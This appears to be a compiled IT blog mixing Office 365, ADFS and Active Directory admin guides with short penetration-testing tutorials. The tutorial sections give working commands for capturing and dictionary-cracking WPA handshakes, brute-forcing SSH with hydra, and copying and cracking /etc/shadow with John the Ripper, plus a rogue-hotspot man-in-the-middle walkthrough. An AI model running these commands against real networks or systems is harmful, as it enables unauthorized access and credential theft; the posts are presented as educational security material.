Intro To Web Application Pentesting

The Open Web Application Security Project - Broken Web Application provides an excellent framework to learn about web application vulnerabilities and test penetration techniques.  This can all be done within a virtual environment and is free!  You can find more information and download the framework here:

https://www.owasp.org/index.php/OWASP_Broken_Web_Applications_Project

Office 365 Deployment

Office 365 Deployment

Initial Setup

Setup your Office 365 account at www.office365.com according to your environment.

Add your domain to your account.

o   Go to the Admin page and click Domains under the Management heading.

o   Verify your domain via a txt record under your authoritative DNS server.  See the online instructions for your particular provider.

o   Define the services you will enroll for Office365.

 Single Sign-On

Prepare Active Directory

If needed, create UPN to match your external domain - http://technet.microsoft.com/en-us/library/cc772007.aspx

Set users to default to this new UPN.

impADFS 2.0 Deployment

o   For redundancy, consider using a federation farm (WID – Windows Internal Database) with proxies and Network Load Balancers.

§  ADFS servers – Domain joined and not a DC

§  ADFS Proxies – Not domain joined and located in the DMZ (Port 443)

o   Configure internal DNS to point to the cluster name.

o   Configure external DNS to point to the NLB for the cluster.

o   Certificates

§  Secure Channel (SSL) from a 3^rd party

§  Token Signing – Auto generated – USE SELF-SIGNED

§  Token Description – Not used often

o   Install ADFS 2.0

§  Run the ADFSSetup.exe

§  After Installation is complete open the AD FS 2.0 Management and Create a new Federation Service.  You will need to choose either a Stand-Alone or Farm Deployment.  Ensure your SSL certificate matches the Federation Service Name.  Make sure to use auto generated certs for the Token Signing.

§  You can ignore the message asking to Add a trusted relying party.  This will be done at a later step.

§  Verify the federation server is operational

• https://fs.domain.com/FederationMetadata/2007-06/FederationMetadata.xml

§  For more details you can go to the online help here:

http://onlinehelp.microsoft.com/en-us/office365-enterprises/ff652539.aspx#bk_deployfsfarm

o   Install Update Rollup 2 for ADFS 2.0

o   ADFS Proxies

§  Consider deploying two federation server proxies to provide fault tolerance and use a network load balancer.

§  Run the ADFSSetup.exe

·         After accepting the license agreement the Server Role page will appear.  Select Federation server proxy.  A restart may be required.

·         Configure the necessary SSL Certificates (3^rd Party).

·         Enter a Federation Service name that matches your certificate.  I used sts.domain.com.

·         Enter credentials with the required permissions to authorize a federation server proxy.

·         Review the settings and click next and close.

·         Verify that the proxy is operational.  Check the event logs for event ID 198 under the application logs.

Microsoft Online Services Module for PowerShell

Download and install Microsoft Online Services Sign-In Assistant version 7.0 or greater

http://onlinehelp.microsoft.com/office365-enterprises/hh124998.aspx

Download the Microsoft Online Services Module

o   http://onlinehelp.microsoft.com/office365-enterprises/hh124998.aspx

Import the module

o   PS C:\> Import-Module msonline

Connect to the MS Online Services

o   PS C:\> $cred = Get-Credential

o   PS C:\> Connect-MsolService -Credential $cred

List Commandlets   

o   PS C:\> Get-Command -Module msonline

Connecting to Microsoft Office 365 with PowerShell

$cred = get-credential

$Session = New-PSSession -ConfigurationName Microsoft.Exchange -ConnectionUri https://ps.outlook.com/powershell/ -Credential $cred -Authentication Basic –AllowRedirection

Import-PSSession $Session

Directory Synchronization

Use the Microsoft Office 365 Deployment Readiness Tool to check for compatibility.

o   http://community.office365.com/en-us/f/183/p/2285/8155.aspx#8155

Do not install on a DC. Can be combined with AD FS.

Activate directory synchronization

o   In your portal, click Admin then Users.  At the top of the page next to the Active Directory synchronization, click Set up and manage Active Directory synchronization and Activate.

o   Install the Directory Synchronization tool – Not on a Domain Controller

§  Download and install the Dir Sync tool for your OS

·         https://portal.microsoftonline.com/DirSync/DirectorySynchronization.aspx

·         Enterprise Admin permissions are required and a new service account will be created – MSOL_AD_SYNC

·         Once installed, you can manually force a synchronization with the start-onlinecoexistencesync command.  You will need to open the DirSyncConfigShell.psc1 PowerShell command prompt located under the install directory.

Outlook Anywhere

Install a valid SSL certificate for Exchange which includes your autodiscover host name.

Install RPC over HTTP proxy component.

Wait 15 mins or reboot server.

Enable Outlook Anywhere on your Exchange 2007.

Wait 15 mins or reboot server.

If running Windows 2008, you may need to edit your hosts files to include:

o   Internal IP and hostname – 192.168.1.10     exchange

o   Internal IP and internal FQDN – 192.168.1.10 exchange.domain.local

Configure your public autodiscover DNS record to point to your DMZ IP address.

Configure your firewall to allow external access for port 443 to your server.

Hostnames/Certificates/Ports Accessible

For a full list of URLs & Ports: http://technet.microsoft.com/en-us/library/hh852445.aspx

Server	Hostname	Certificate	Ports
AD FS Server	fs.domain.com	Auto/3rd Party SSL	443
AD FS Proxy	Sts.domain.com	3rd Party SSL	443
Exchange	Exchange Mail.domain.com Webmail.domain.com Autodiscover.domain.com	3rd Party UC/SAN SSL	25/443

Hacking WPA

WPA/WPA2 is susceptible to dictionary based attacks. The best way to protect against this type of attack is to use a complex passphrase used to create the Pre-Shared Key (PSK) and change it regularly.

WPA creates a per-session key called the Pairwise Transient Key (PTK). This key is created using the PSK and other parameters such as the SSID, ANounce, Snounce, AP MAC, and Client MAC. The only parameter not easily available to an attacker is the PSK. The PSK key is created using the passphrase and SSID which is passed through the Password Based Key Derivation Function (PBKDF2). The output is a 256-bit shared key.

An attacker will use a dictionary attack to create the 256-bit PSK which combine with the other parameters will create a PTK. The PTK is used with the Message Integrity Check (MIC) in one of the packets of the handshake to determine if they match. If they do, then the passphrase was guessed properly. If not, the process repeats itself throughout the dictionary.

This is for educational purposes only.  Do not attempt this on networks without their explicit permission. The steps below will illustrate the process:

1. airodump-ng mon0 –channel X –write target.cap (Wait for a WPA Handshake)
2. aircrack-ng target.cap -w dictionary (Performs the dictionary attack)

Once you have the key, you can use Wireshark or airdecap-ng to view the packets.

Many thanks to Vivek Ramachandran of Securitytube for explaining the material!

Converting Primary Zones to AD Integrated Zones

The process of converting your primary DNS zones to AD integrated zones is a relatively simple process involving  the selection of the check box to store the zone in Active Directory.  There are a few things to consider when making these changes.

• The DNS server must also be a domain controller.
• Only primary zones can be stored in AD.
• Secondary zones installed on other domain controllers will be converted when the primary zone is changed.  This process will occur once AD DS has been restarted.
• In large environments, this process can take time.
• Once the process has been complete, review the DNS logs and verify the zones are functioning properly.

Who's in the middle

When your at your local coffee shop or joining that "Free Wifi" hotspot, you might want to think twice!  Anything you send and receive can be "sniffed" without you knowing.  I will demonstrate how easy it is to perform a Man in the Middle (MiTM) attack.  I will setup a "Free Wifi" hotspot and have my test machine connect for some "Free" browsing! You'll need a wireless card that supports packet injection.  The Alfa AWUS036H is a great model and well supported with Backtrack.

*******************************************************************************
 DISCLAIMER - This is only for educational purposes to help make you aware of the risks with wireless.

*******************************************************************************

The first step is to ensure your interfaces are up.

Next you'll need to put your card in monitor mode.  Additional commands may be used to resolve warning messages.

Now lets set the channel for our wireless card and the monitor interface.





It is now time to create our "Free Wifi" hotspot.  This command will remain open during the test.  You will see when "clients" connect.










A new interface will be created (at0) and will need be brought up.  We will use brctl to create a bridge so that our "clients" can access the internet through eth0.

Next we'll need to assign IP addresses to the interfaces and bring up the bridge.

At this point all traffic is now routed through the attackers machine.  Tools such as Wireshark, Urlsniff, driftnet, or webspy could be used to monitor "client" traffic.

If you use public wifi,  keep these things in mind.  Using a VPN is a good idea.

Modifying Custom AD Attributes w/Powershell

Recently I needed to create a custom user attribute within our Active Directory environment.  Rather than manually edit each user with the new value, I thought of using Powershell to automate the process.  I began testing the process using set-aduser.  Generally you'd find the associated property and add the value:

set-aduser username -EmailAddress username@domain.com

The custom attribute I created was EmployeeDOB so I ran the same command but the property was not recognized.  After some research and help from the Technet forums, I was introduced to the following options:

set-aduser username -Add @{EmployeeDOB='5-1-1978'}

set-aduser username -Replace @{EmployeeDOB='4-1-1980'}

set-aduser username -Remove @{EmployeeDOB='4-1-1980'}

With this new knowledge, I can now hopefully save some time by not having to manually edit these values within ADUC!!

Brute Force Cracking of SSH

You can use Hydra to attempt a brute force attack of SSH.  You'll need a known user account and comprehensive password file.  Root is generally a known user account, but some system admins choose to disable the account from logging in via SSH.  Once you have the above prerequisites you can run the following command:

hydra -l <user> -P wordlist.txt 192.168.0.5 ssh

Happy Hunting!

Disclaimer - Only test this with systems you own and have permission to test!

My old blog content is here:

http://noobscripts.blogspot.com/

Cracking your shadow!

If you really need to know the password for one of your Linux accounts, you can use some creative means to capture the necessary files and John the Ripper.

As long as your system is not using full disc encryption, you can boot your system with Backtrack 5 R2.  Once the system is up, you'll need to mount the hard drive and copy the passwd and shadow files.

     mkdir /mnt/crack
     mount /dev/sda1 /mnt/crack


     cp /etc/passwd /mnt/crack
     cp /etc/shadow /mnt/crack

Once you have the files copied to your temporary directory you can use John the Ripper to crack the passwords.  Backtrack 5 R2 comes with a decent password dictionary for starters.  You will need to join the passwd and shadow files before you can run JTR.  You'll need to be in the working directory of JTR or use the full path.

     ./unshadow /mnt/crack/passwd /mnt/crack/shadow > /mnt/crack/linux_hashes.txt
     ./john /mnt/crack/linux_hashes.txt


The cracking process will take time depending on a number of factors.  The complexity of your passwords, quality of your wordlist, and the speed of your hardware will determine the speed or your request.  You noticed that with these simple passwords, it took over 5 minutes to crack the passwords.  Your results make look similar to below:
     root@root:~# /pentest/passwords/john/john ./linux_hash.txt Loaded 3 password hashes with 3
     different salts (generic crypt(3) [?/32])
     evil             (hacker)
     guesses: 1  time: 0:00:01:14 31.33% (1) (ETA: Mon Jul  9 17:01:11
     2012)  c/s: 48.82  trying: tkirk - 7jkirk
     password         (joe)
     red              (jim)
     guesses: 3  time: 0:00:05:50 DONE (Mon Jul  9 17:03:05 2012)  c/s:
     50.07  trying: ncc1701d - 1022
     Use the "--show" option to display all of the cracked passwords reliably 
     root@root:~#

Connecting to MS Office 365 Via Power Shell

1.  Download and install Microsoft Online Services Sign-In Assistant version 7.0 or greater
- http://onlinehelp.microsoft.com/office365-enterprises/hh124998.aspx

2.  Download the Microsoft Online Services Module
- http://onlinehelp.microsoft.com/office365-enterprises/hh124998.aspx

3.  Import the module
- PS C:\> Import-Module msonline

4.  Connect to the MS Online Services
- PS C:\> $cred = Get-Credential


 cmdlet Get-Credential at command pipeline position 1
 Supply values for the following parameters:
   Credential
 PS C:\> Connect-MsolService -Credential $cred
 PS C:\>

5.  PS C:\> Get-Command -Module msonline

    CommandType     Name                                                Definition
    -----------     ----                                                ----------
    Cmdlet          Add-MsolGroupMember                                 Add-MsolGroupMember
    Cmdlet          Add-MsolRoleMember                                  Add-MsolRoleMember